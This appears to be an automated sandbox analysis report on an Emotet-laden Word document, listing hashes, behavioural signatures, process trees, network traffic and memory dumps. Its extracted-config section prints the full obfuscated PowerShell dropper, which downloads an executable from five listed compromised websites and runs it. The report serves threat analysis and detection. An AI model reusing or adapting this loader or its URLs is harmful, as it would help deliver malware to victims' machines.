Analysis

  • max time kernel
    58s
  • max time network
    55s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    18-07-2020 05:00

General

  • Target

    e8f1f437e1fa36a8bccefe4b451b6574d2c70a1c24cd56ea42cc6ab51cee6e60.doc

  • Size

    192KB

  • MD5

    f91ef02234ef7391c9a65486999ae11e

  • SHA1

    9e2ec066f5b172e283edda528781021cc09e8e2a

  • SHA256

    e8f1f437e1fa36a8bccefe4b451b6574d2c70a1c24cd56ea42cc6ab51cee6e60

  • SHA512

    f8edce62eae2e7118cb0eb73537e41d0396e4ff6746a45aa6425728b7e05f3f5c2c2837730966f6b4702e164de8e4a31efc1e0b83c45df3376e57d66c6400ecb

Malware Config

Extracted

Language
ps1
Source
$noug='maultoezveukrioxbewxij';[Net.ServicePointManager]::"seCur`iTy`P`ROto`COl" = 'tls12, tls11, tls';$jaothpaoth = '870';$louqu='booyweejnealkeov';$dubkeokpip=$env:userprofile+'\'+$jaothpaoth+'.exe';$toaxnoirfietsounsiqu='xoequnool';$cuathcioy=&('new-ob'+'je'+'ct') net.WEbClIENT;$ceexthauchheif='https://www.20190607.com/wp-admin/ixyjozs/*https://lovely-lollies.com/wp-admin/fgvid/*https://www.angage.com/wp-content/mtincvc/*https://connect-plus.co.uk/aspnet_client/3yey3rr/*http://mapas.hoonicorns.pt/comp3/ly8cmti/'."SpL`it"([char]42);$quihjoufjeeploofmeov='loithmaichjoofnaet';foreach($yeeynoobniokgiohxurzaip in $ceexthauchheif){try{$cuathcioy."DoWN`lO`ADFILe"($yeeynoobniokgiohxurzaip, $dubkeokpip);$raequhuaxliajjeik='mew';If ((.('Ge'+'t-I'+'tem') $dubkeokpip)."Leng`TH" -ge 26887) {([wmiclass]'win32_Process')."cRe`AtE"($dubkeokpip);$siechietchuancoildeechtuach='thoun';break;$kuucpeadfeogdaezseuj='sakniorguzriognuuzcoth'}}catch{}}$heufrookriajtheulcieb='ziaqucoexthiezmuuc'
URLs

exe.dropper: https://www.20190607.com/wp-admin/ixyjozs/
exe.dropper: https://lovely-lollies.com/wp-admin/fgvid/
exe.dropper: https://www.angage.com/wp-content/mtincvc/
exe.dropper: https://connect-plus.co.uk/aspnet_client/3yey3rr/
exe.dropper: http://mapas.hoonicorns.pt/comp3/ly8cmti/

Extracted

Family

emotet

C2


rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS
Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS
fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB
-----END PUBLIC KEY-----

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e8f1f437e1fa36a8bccefe4b451b6574d2c70a1c24cd56ea42cc6ab51cee6e60.doc"
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1400
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e 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
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:1340
  • C:\Users\Admin\870.exe
    C:\Users\Admin\870.exe
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    PID:580
    • C:\Windows\SysWOW64\uexfat\btpanui.exe
      "C:\Windows\SysWOW64\uexfat\btpanui.exe"
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      PID:1884

Network

  • flag-unknown
    DNS
    www.20190607.com
    Remote address:
    8.8.8.8:53
    Request
    www.20190607.com
    IN A
    Response
    www.20190607.com
    IN A
    129.226.70.136
  • flag-unknown
    GET
    https://www.20190607.com/wp-admin/ixyjozs/
    powersheLL.exe
    Remote address:
    129.226.70.136:443
    Request
    GET /wp-admin/ixyjozs/ HTTP/1.1
    Host: www.20190607.com
    Connection: Keep-Alive
  • flag-unknown
    DNS
    apps.identrust.com
    Remote address:
    8.8.8.8:53
    Request
    apps.identrust.com
    IN A
    Response
    apps.identrust.com
    IN CNAME
    apps.digsigtrust.com
    apps.digsigtrust.com
    IN A
    192.35.177.64
  • flag-unknown
    GET
    http://apps.identrust.com/roots/dstrootcax3.p7c
    powersheLL.exe
    Remote address:
    192.35.177.64:80
    Request
    GET /roots/dstrootcax3.p7c HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: apps.identrust.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jul 2020 21:42:00 GMT
    Server: Apache
    X-XSS-Protection: 1; mode=block
    Strict-Transport-Security: max-age=15768000
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' *.identrust.com
    Cache-control: max-age=86400
    Last-Modified: Thu, 13 Feb 2020 15:25:43 GMT
    ETag: "37d-59e76b3c64bc0"
    Accept-Ranges: bytes
    Content-Length: 893
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Keep-Alive: timeout=5, max=100
    Content-Type: application/pkcs7-mime
  • flag-unknown
    DNS
    www.download.windowsupdate.com
    Remote address:
    8.8.8.8:53
    Request
    www.download.windowsupdate.com
    IN A
    Response
    www.download.windowsupdate.com
    IN CNAME
    wu-fg-shim.trafficmanager.net
    wu-fg-shim.trafficmanager.net
    IN CNAME
    2-01-3cf7-0009.cdx.cedexis.net
    2-01-3cf7-0009.cdx.cedexis.net
    IN CNAME
    cds.d2s7q6s2.hwcdn.net
    cds.d2s7q6s2.hwcdn.net
    IN A
    205.185.216.42
    cds.d2s7q6s2.hwcdn.net
    IN A
    205.185.216.10
  • flag-unknown
    GET
    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    powersheLL.exe
    Remote address:
    205.185.216.42:80
    Request
    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
    Cache-Control: max-age = 3600
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Tue, 21 Apr 2020 00:50:26 GMT
    If-None-Match: "03582d87617d61:0"
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.download.windowsupdate.com
    Response
    HTTP/1.1 200 OK
    Date: Sat, 18 Jul 2020 05:01:19 GMT
    Connection: Keep-Alive
    Cache-Control: public, max-age=3600
    Content-Length: 58367
    Content-Type: application/vnd.ms-cab-compressed
    Last-Modified: Sat, 13 Jun 2020 20:53:32 GMT
    Accept-Ranges: bytes
    ETag: "06e9cb2c441d61:0"
    X-HW: 1595048479.dop007.am5.t,1595048479.cds131.am5.c
    X-CCC: NL
    X-CID: 9
  • 129.226.70.136:443
    https://www.20190607.com/wp-admin/ixyjozs/
    tls, http
    powersheLL.exe
    6.4kB
    292.6kB
    125
    204

    HTTP Request

    GET https://www.20190607.com/wp-admin/ixyjozs/
  • 192.35.177.64:80
    http://apps.identrust.com/roots/dstrootcax3.p7c
    http
    powersheLL.exe
    369 B
    1.6kB
    5
    3

    HTTP Request

    GET http://apps.identrust.com/roots/dstrootcax3.p7c

    HTTP Response

    200
  • 205.185.216.42:80
    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    http
    powersheLL.exe
    1.5kB
    60.5kB
    26
    44

    HTTP Request

    GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

    HTTP Response

    200
  • 109.117.53.230:443
    btpanui.exe
    152 B
    3
  • 10.7.0.255:137
    netbios-ns
    624 B
    8
  • 224.0.0.252:5355
    100 B
    2
  • 8.8.8.8:53
    www.20190607.com
    dns
    62 B
    78 B
    1
    1

    DNS Request

    www.20190607.com

    DNS Response

    129.226.70.136

  • 8.8.8.8:53
    apps.identrust.com
    dns
    64 B
    111 B
    1
    1

    DNS Request

    apps.identrust.com

    DNS Response

    192.35.177.64

  • 8.8.8.8:53
    www.download.windowsupdate.com
    dns
    76 B
    225 B
    1
    1

    DNS Request

    www.download.windowsupdate.com

    DNS Response

    205.185.216.42
    205.185.216.10

  • 239.255.255.250:1900
    966 B
    6
  • 239.255.255.250:1900
  • 224.0.0.252:5355
    100 B
    2

MITRE ATT&CK Enterprise v6

Downloads

  • memory/580-9-0x0000000000260000-0x000000000026C000-memory.dmp

    Filesize

    48KB

  • memory/1400-2-0x0000000008B60000-0x0000000008B64000-memory.dmp

    Filesize

    16KB

  • memory/1400-4-0x000000000B2D0000-0x000000000B2D4000-memory.dmp

    Filesize

    16KB

  • memory/1400-5-0x000000000C350000-0x000000000C354000-memory.dmp

    Filesize

    16KB

  • memory/1884-12-0x00000000003B0000-0x00000000003BC000-memory.dmp

    Filesize

    48KB
